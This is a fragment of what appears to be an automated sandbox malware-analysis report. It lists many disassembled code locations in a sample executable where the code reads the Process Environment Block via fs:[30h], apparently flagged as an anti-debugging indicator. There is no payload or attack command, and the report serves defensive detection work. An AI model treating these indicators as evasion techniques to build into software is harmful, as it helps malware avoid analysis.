Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h] 1_2_00A09100
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h] 1_2_00A0C962
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] 1_2_00A0B171
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h] 1_2_00A0B171
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] 1_2_00A2B944
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h] 1_2_00A2B944
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h] 1_2_00A052A5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A1AAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A1AAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A3FAB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] 1_2_00A3D294
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h] 1_2_00A3D294
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h] 1_2_00A32AE4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h] 1_2_00A32ACB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] 1_2_00A44A2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h] 1_2_00A44A2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h] 1_2_00A18A0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h] 1_2_00A05210
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A0AA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A0AA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ACAA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 1_2_00ACAA16
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h] 1_2_00A23A1C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] 1_2_00ABB260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h] 1_2_00ABB260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h] 1_2_00AD8A62
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h] 1_2_00A4927A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h] 1_2_00A09240
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h] 1_2_00ACEA55
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h] 1_2_00A94257
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD5BA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h] 1_2_00A34BAD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h] 1_2_00AC138A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h] 1_2_00ABD380
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h] 1_2_00A11B8F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h] 1_2_00A11B8F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h] 1_2_00A3B390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h] 1_2_00A32397
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h] 1_2_00A303E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h] 1_2_00A2DBE9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h] 1_2_00A853CA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h] 1_2_00A853CA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h] 1_2_00AC131B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00A0DB60
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h] 1_2_00A33B7A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h] 1_2_00A33B7A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h] 1_2_00A0DB40
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h] 1_2_00AD8B58
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h] 1_2_00A0F358
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h] 1_2_00A1849B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h] 1_2_00AC14FB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A86CF0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h] 1_2_00AD8CD6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h] 1_2_00A3BC2C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h] 1_2_00AD740D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h] 1_2_00A86C0A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 1_2_00AC1C06
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2746D mov eax, dword ptr fs:[00000030h] 1_2_00A2746D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A44B mov eax, dword ptr fs:[00000030h] 1_2_00A3A44B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h] 1_2_00A9C450
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9C450 mov eax, dword ptr fs:[00000030h] 1_2_00A9C450
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h] 1_2_00AD05AC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD05AC mov eax, dword ptr fs:[00000030h] 1_2_00AD05AC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A335A1 mov eax, dword ptr fs:[00000030h] 1_2_00A335A1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 1_2_00A31DB5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 mov eax, dword ptr fs:[00000030h] 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A02D8A mov eax, dword ptr fs:[00000030h] 1_2_00A02D8A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A3FD9B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 1_2_00A3FD9B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 1_2_00ACFDE2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AB8DF1 mov eax, dword ptr fs:[00000030h] 1_2_00AB8DF1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A86DC9
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0AD30 mov eax, dword ptr fs:[00000030h] 1_2_00A0AD30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A13D34 mov eax, dword ptr fs:[00000030h] 1_2_00A13D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACE539 mov eax, dword ptr fs:[00000030h] 1_2_00ACE539
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A34D3B mov eax, dword ptr fs:[00000030h] 1_2_00A34D3B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8D34 mov eax, dword ptr fs:[00000030h] 1_2_00AD8D34
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A8A537 mov eax, dword ptr fs:[00000030h] 1_2_00A8A537
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h] 1_2_00A2C577
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2C577 mov eax, dword ptr fs:[00000030h] 1_2_00A2C577
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A43D43 mov eax, dword ptr fs:[00000030h] 1_2_00A43D43
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A83540 mov eax, dword ptr fs:[00000030h] 1_2_00A83540
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AB3D40 mov eax, dword ptr fs:[00000030h] 1_2_00AB3D40
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A27D50 mov eax, dword ptr fs:[00000030h] 1_2_00A27D50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 1_2_00AD0EA5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A846A7 mov eax, dword ptr fs:[00000030h] 1_2_00A846A7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A9FE87
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A316E0 mov ecx, dword ptr fs:[00000030h] 1_2_00A316E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A176E2 mov eax, dword ptr fs:[00000030h] 1_2_00A176E2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A48EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A48EC7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFEC0 mov eax, dword ptr fs:[00000030h] 1_2_00ABFEC0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A336CC mov eax, dword ptr fs:[00000030h] 1_2_00A336CC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8ED6 mov eax, dword ptr fs:[00000030h] 1_2_00AD8ED6
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0E620 mov eax, dword ptr fs:[00000030h] 1_2_00A0E620
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFE3F mov eax, dword ptr fs:[00000030h] 1_2_00ABFE3F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h] 1_2_00A0C600
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h] 1_2_00A38E00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h] 1_2_00AC1608
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h] 1_2_00A3A61C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h] 1_2_00A3A61C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h] 1_2_00A1766D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 1_2_00A2AE73
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h] 1_2_00A17E41
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 1_2_00ACAE44
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 1_2_00ACAE44
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h] 1_2_00A18794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h] 1_2_00A87794
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h] 1_2_00A437F5
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h] 1_2_00A04F2E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h] 1_2_00A04F2E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h] 1_2_00A3E730
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h] 1_2_00AD070D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h] 1_2_00AD070D
